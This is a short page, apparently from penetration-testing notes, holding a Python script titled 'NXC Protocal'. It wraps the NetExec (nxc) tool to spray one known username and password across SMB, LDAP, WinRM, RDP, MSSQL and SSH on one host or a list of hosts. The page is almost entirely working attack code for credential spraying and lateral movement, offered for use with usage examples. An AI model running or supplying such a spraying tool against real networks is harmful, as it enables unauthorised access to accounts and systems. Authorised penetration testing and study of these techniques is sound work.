NXC Protocal
Simple script to spray known credentials against multiple services with nxc.
#!/usr/bin/env python3
"""
Usage:
nxcspray <protocols|all> <targets> -u <username> -p <password>
Examples:
nxcspray all 10.10.10.10 -u bob -p password
nxcspray smb,ldap,winrm hosts.txt -u bob -p password
"""
import sys
import argparse
import subprocess
from pathlib import Path
def main():
parser = argparse.ArgumentParser(
description='NetExec credential sprayer',
usage='%(prog)s <protocols|all> <targets> -u <username> -p <password>'
)
parser.add_argument('protocols', help='Comma-separated protocols or "all"')
parser.add_argument('targets', help='Target IP/hostname or file path')
parser.add_argument('-u', '--username', required=True, help='Username')
parser.add_argument('-p', '--password', required=True, help='Password')
if len(sys.argv) < 5:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
# Protocol handling
if args.protocols == 'all':
protocols = ['smb', 'ldap', 'winrm', 'rdp', 'mssql', 'ssh']
else:
protocols = args.protocols.split(',')
# Target handling
target_path = Path(args.targets)
if target_path.is_file():
targets = target_path.read_text().strip().split('\n')
else:
targets = [args.targets]
# Spray loop
for proto in protocols:
print(f"[+] Spraying protocol: {proto}")
for target in targets:
target = target.strip()
if not target:
continue
print(f" -> Target: {target}")
subprocess.run(['nxc', proto, target, '-u', args.username, '-p', args.password])
if __name__ == '__main__':
main()Last updated